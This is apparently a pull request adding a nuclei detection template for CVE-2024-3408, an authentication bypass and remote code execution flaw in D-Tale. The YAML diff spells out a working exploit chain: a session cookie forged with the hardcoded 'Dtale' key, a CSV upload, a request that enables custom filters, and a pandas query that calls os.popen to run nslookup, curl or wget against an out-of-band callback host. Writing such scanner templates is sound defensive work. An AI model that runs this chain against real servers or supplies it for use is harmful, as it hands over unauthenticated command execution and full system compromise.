### PR TITLE
feat: add CVE-2024-3408 D-Tale authentication bypass and RCE template

### DIFF
--- a/http/cves/2024/CVE-2024-3408.yaml
+++ b/http/cves/2024/CVE-2024-3408.yaml
@@ -1,0 +1,130 @@
+id: CVE-2024-3408
+
+info:
+  name: D-Tale - Authentication Bypass and Remote Code Execution
+  author: nuclei-contributor
+  severity: critical
+  description: |
+    D-Tale versions <= 3.15.1 contain an authentication bypass vulnerability due to a hardcoded SECRET_KEY ("Dtale") in Flask configuration.
+    This allows attackers to forge session cookies and subsequently execute arbitrary code through the custom filters functionality by exploiting
+    the enable_custom_filters setting and the test-filter endpoint which evaluates pandas expressions with access to Python builtins.
+  impact: |
+    Successful exploitation allows unauthenticated attackers to bypass authentication and execute arbitrary system commands on the server,
+    leading to complete system compromise.
+  remediation: |
+    Update D-Tale to version 3.16.0 or later where the SECRET_KEY is randomly generated during installation.
+  reference:
+    - https://huntr.com/bounties/57a06666-ff85-4577-af19-f3dfb7b02f91
+    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-3408
+    - https://github.com/man-group/dtale
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-3408
+    cwe-id: CWE-798,CWE-94
+    cpe: cpe:2.3:a:man-group:dtale:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: man-group
+    product: dtale
+    shodan-query: http.title:"D-Tale"
+    fofa-query: title="D-Tale"
+  tags: cve,cve2024,dtale,auth-bypass,rce,intrusive,flask,hardcoded-secret
+
+http:
+  - raw:
+      # Step 1: Verify auth bypass by accessing protected endpoint with forged session cookie
+      # Flask session forged with SECRET_KEY "Dtale" containing {"logged_in": true, "username": "nuclei"}
+      - |
+        GET /dtale/popup/upload HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoibnVjbGVpIn0.aXUDvw.Lxiaa0hy14-PJFEzHsGg3s7Y7ZU
+
+      # Step 2: Upload CSV file to get data_id for subsequent exploitation
+      - |
+        POST /dtale/upload HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoibnVjbGVpIn0.aXUDvw.Lxiaa0hy14-PJFEzHsGg3s7Y7ZU
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNuclei
+
+        ------WebKitFormBoundaryNuclei
+        Content-Disposition: form-data; name="nuclei.csv"; filename="nuclei.csv"
+        Content-Type: text/csv
+
+        a,b
+        1,2
+        ------WebKitFormBoundaryNuclei
+        Content-Disposition: form-data; name="header"
+
+        true
+        ------WebKitFormBoundaryNuclei
+        Content-Disposition: form-data; name="separatorType"
+
+        comma
+        ------WebKitFormBoundaryNuclei
+        Content-Disposition: form-data; name="separator"
+
+
+        ------WebKitFormBoundaryNuclei--
+
+      # Step 3: Enable custom filters which unlocks the code execution functionality
+      - |
+        GET /dtale/update-settings/{{data_id}}?settings=%7B%22enable_custom_filters%22%3Atrue%7D HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoibnVjbGVpIn0.aXUDvw.Lxiaa0hy14-PJFEzHsGg3s7Y7ZU
+
+      # Step 4: Execute RCE via pandas expression evaluation with Python builtin access
+      # Payload uses nslookup for DNS-based OOB (more reliable across platforms)
+      - |
+        GET /dtale/test-filter/{{data_id}}?query=%40pd.core.frame.com.builtins.__import__(%27os%27).popen(%27nslookup%20{{interactsh-url}}%20||%20curl%20{{interactsh-url}}%20||%20wget%20-q%20{{interactsh-url}}%27).read()&save=false HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoibnVjbGVpIn0.aXUDvw.Lxiaa0hy14-PJFEzHsGg3s7Y7ZU
+
+    extractors:
+      - type: regex
+        name: data_id
+        part: body_2
+        group: 1
+        regex:
+          - '"data_id"\s*:\s*"?(\d+)"?'
+        internal: true
+
+      - type: regex
+        name: version
+        part: body_1
+        group: 1
+        regex:
+          - 'id="version"\s+value="([^"]+)"'
+
+    matchers-condition: and
+    matchers:
+      # Verify D-Tale application is present and auth bypass succeeded
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200'
+          - 'contains(body_1, "D-Tale") || contains(body_1, "dtale")'
+        condition: and
+
+      # Verify CSV upload succeeded and got data_id
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_2, "data_id")'
+        condition: and
+
+      # Verify settings update succeeded
+      - type: dsl
+        dsl:
+          - 'status_code_3 == 200'
+          - 'contains(body_3, "success")'
+        condition: and
+
+      # Verify OOB callback received confirming RCE
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+          - "dns"
+        condition: or


### PR DESCRIPTION
## Summary
Adds a nuclei template to detect CVE-2024-3408 - D-Tale Authentication Bypass and Remote Code Execution vulnerability.

## Vulnerability Details
- **CVE:** CVE-2024-3408
- **Severity:** Critical (CVSS 9.8)
- **Affected:** D-Tale <= 3.15.1
- **Root Cause:** Hardcoded Flask SECRET_KEY ("Dtale") allows session cookie forgery, combined with unsafe pandas expression evaluation in custom filters

## Template Features
- Multi-step attack chain (not just version detection)
- Forges Flask session cookie using known SECRET_KEY
- Exploits enable_custom_filters + test-filter endpoint
- OOB detection via interactsh (curl/nslookup/wget fallbacks)
- Extracts version and data_id for debugging

## References
- https://huntr.com/bounties/57a06666-ff85-4577-af19-f3dfb7b02f91
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
- https://nvd.nist.gov/vuln/detail/CVE-2024-3408

## Testing Notes
- Vulnerable versions: D-Tale <= 3.15.1
- Default port: 40000
- Session cookies don't expire by default

/claim #14488